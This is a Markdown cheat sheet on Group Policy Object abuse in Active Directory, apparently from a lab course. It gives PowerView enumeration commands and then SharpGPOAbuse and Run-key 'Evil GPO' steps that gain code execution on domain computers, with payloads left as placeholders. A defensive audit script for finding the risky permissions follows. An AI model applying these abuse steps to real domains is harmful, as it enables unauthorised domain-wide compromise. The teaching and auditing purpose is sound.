# GPOs

## Introduction

A GPO (Group Policy Object) is a collection of settings that define how computers and users on a network should behave. GPOs are used to enforce security policies, configure system settings, and manage software installations across multiple computers in an organization.

If ordinary domain users can modify a GPO, the consequences are serious: anyone with write access to the policy can obtain code execution on every computer the GPO applies to.

## Modifiable GPOs

1. Enumerate modifiable GPOs.

```powershell
Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "CreateChild|WriteProperty" -and $_.SecurityIdentifier -match "S-1-5-21-569305411-121244042-2357301523-[\d]{4,10}" }
```

2. If there is any, resolve its GPO name and the SID of the principal.

```powershell
Get-DomainGPO -Identity "<ObjectDN>" | select displayName, gpcFileSysPath
ConvertFrom-SID <SecurityIdentifier>
```

3. Find out the OU where the GPO is linked.

```powershell
Get-DomainOU -GPLink "{RelativeDN}" | select distinguishedName
```

4. Get the computers the GPO applies to.

```powershell
Get-DomainComputer -SearchBase "<OU_distinguishedname>" | select dnsHostName
```

5. Modify the GPO.

```powershell
.\SharpGPOAbuse.exe --AddComputerScript --ScriptName startup.bat --ScriptContents "<SCRIPT_CONTENT>" --GPOName "<GPO_NAME>"
```

6. Wait for the GPO to take effect (20 minutes or so).

## Principals with Create groupPolicyContainer objects privilege

1. Enumerate principals (users/groups) that can create new GPOs in the domain.

```powershell
Get-DomainObjectAcl -Identity "CN=Policies,CN=System,DC=dev,DC=cyberbotic,DC=io" -ResolveGUIDs | ? { $_.ObjectAceType -eq "Group-Policy-Container" -and $_.ActiveDirectoryRights -contains "CreateChild" } | % { ConvertFrom-SID $_.SecurityIdentifier }
```

2. Look for OUs where the principal has "WriteProperty" on the "GP-Link" attribute.

3. Become the principal and create a GPO.

> :information_source: Because the payload is placed in the Run registry key, the workstation must be restarted before the payload executes.

```powershell
Set-GPPrefRegistryValue -Name "Evil GPO" -Context Computer -Action Create -Key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" -ValueName "Updater" -Value "<COMMAND>" -Type ExpandString
```
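The two sections above enumerate, from the attacker's side, GPOs that non-privileged principals can edit and principals that can create GPOs or rewrite an OU's gPLink. The same three conditions are what a domain administrator should audit regularly. The following is an added defensive audit script, not part of the original page and not from the tools it references; it uses the RSAT `GroupPolicy` and `ActiveDirectory` modules rather than PowerView. The `$ExpectedEditors` list is an assumption about which principals are supposed to hold write rights in a default domain; extend it with your own delegated GPO administrators so they are not reported.

```powershell
# Added audit example (not from the original page). Run on a domain-joined host
# with the RSAT GroupPolicy and ActiveDirectory modules installed.
Import-Module GroupPolicy
Import-Module ActiveDirectory

# Assumption: these are the only principals expected to hold write rights on
# GPOs, the Policies container and OU gPLink attributes. Adjust per domain.
$ExpectedEditors = @('Domain Admins', 'Enterprise Admins', 'SYSTEM',
                     'ENTERPRISE DOMAIN CONTROLLERS', 'Administrators')

# Resolve a schema class/attribute GUID dynamically instead of hardcoding it.
function Get-SchemaGuid([string]$LdapDisplayName) {
    $schemaNc = (Get-ADRootDSE).schemaNamingContext
    $obj = Get-ADObject -SearchBase $schemaNc -LDAPFilter "(lDAPDisplayName=$LdapDisplayName)" -Properties schemaIDGUID
    return [guid][byte[]]$obj.schemaIDGUID
}

# Section "Modifiable GPOs": report every GPO where a trustee outside the
# expected set holds GpoEdit or GpoEditDeleteModifySecurity, together with
# the OUs/domain roots the GPO is linked to (found via a gPLink substring match).
function Get-RiskyGpoEditor {
    foreach ($gpo in Get-GPO -All) {
        $links = Get-ADObject -LDAPFilter "(gPLink=*{$($gpo.Id)}*)" |
                 Select-Object -ExpandProperty DistinguishedName
        foreach ($p in (Get-GPPermission -Guid $gpo.Id -All)) {
            $level = "$($p.Permission)"
            if ($level -in @('GpoEdit', 'GpoEditDeleteModifySecurity') -and
                $ExpectedEditors -notcontains $p.Trustee.Name) {
                [PSCustomObject]@{
                    GpoName    = $gpo.DisplayName
                    GpoId      = $gpo.Id
                    Trustee    = $p.Trustee.Name
                    Permission = $level
                    LinkedTo   = ($links -join '; ')
                }
            }
        }
    }
}

# Section "Principals with Create groupPolicyContainer objects privilege":
# report ACEs on CN=Policies granting CreateChild either for any object type
# (empty ObjectType) or specifically for the groupPolicyContainer class.
function Get-GpoCreator {
    $domainDn  = (Get-ADDomain).DistinguishedName
    $gpcGuid   = Get-SchemaGuid 'groupPolicyContainer'
    $acl       = Get-Acl -Path "AD:\CN=Policies,CN=System,$domainDn"
    $createBit = [System.DirectoryServices.ActiveDirectoryRights]::CreateChild
    $acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        ($_.ActiveDirectoryRights -band $createBit) -and
        ($_.ObjectType -eq [guid]::Empty -or $_.ObjectType -eq $gpcGuid) -and
        ($ExpectedEditors -notcontains ($_.IdentityReference.Value -split '\\')[-1])
    } | Select-Object IdentityReference, ActiveDirectoryRights, ObjectType
}

# Step 2 of that section: OUs where someone outside the expected set can write
# gPLink (explicitly, or via a blanket WriteProperty/GenericWrite/GenericAll ACE).
function Get-GpLinkWriter {
    $gpLinkGuid = Get-SchemaGuid 'gPLink'
    $writeBit   = [System.DirectoryServices.ActiveDirectoryRights]::WriteProperty
    foreach ($ou in Get-ADOrganizationalUnit -Filter *) {
        $acl = Get-Acl -Path "AD:\$($ou.DistinguishedName)"
        foreach ($ace in $acl.Access) {
            $name = ($ace.IdentityReference.Value -split '\\')[-1]
            if ($ace.AccessControlType -eq 'Allow' -and
                ($ace.ActiveDirectoryRights -band $writeBit) -and
                ($ace.ObjectType -eq [guid]::Empty -or $ace.ObjectType -eq $gpLinkGuid) -and
                $ExpectedEditors -notcontains $name) {
                [PSCustomObject]@{
                    OU         = $ou.DistinguishedName
                    Identity   = $ace.IdentityReference
                    Rights     = $ace.ActiveDirectoryRights
                    ObjectType = $ace.ObjectType
                }
            }
        }
    }
}

# Usage: each function emits objects, so the results can be piped to
# Format-Table, Export-Csv or a SIEM forwarder for periodic review.
Get-RiskyGpoEditor | Format-Table -AutoSize
Get-GpoCreator     | Format-Table -AutoSize
Get-GpLinkWriter   | Format-Table -AutoSize
```

Any row these functions return maps directly onto one of the abuse paths described above: a non-admin trustee with `GpoEdit` is the precondition for the SharpGPOAbuse step, and a non-admin with `CreateChild` on the Policies container plus `WriteProperty` on an OU's gPLink is the precondition for the "Evil GPO" step. Remediation in both cases is removing the delegated right (or moving the principal into a deliberately managed GPO-administration group) and then re-running the audit.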
